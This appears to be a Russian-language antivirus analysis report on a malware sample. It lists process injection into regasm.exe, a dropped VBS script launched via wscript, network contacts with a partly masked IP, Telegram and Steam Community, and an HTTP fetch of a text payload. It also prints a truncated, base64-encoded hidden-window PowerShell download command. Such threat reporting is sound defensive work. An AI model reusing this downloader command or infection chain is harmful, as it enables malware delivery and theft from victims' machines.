Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework64\v4.0.30319\regasm.exe
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\366611.vbs
Сетевая активность
Подключается к
- '19#.#51.107.217':80
- 'te##gram.me':443
- 'st####ommunity.com':443
TCP
Запросы HTTP GET
- http://19#.#51.107.217/public_files/mLDeqtd.txt
Другие
- 'st####ommunity.com':443
UDP
- DNS ASK te##gram.me
- DNS ASK st####ommunity.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' //B %LOCALAPPDATA%\366611.vbs
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ondoiw ='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAH... (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v4.0.30319\regasm.exe'
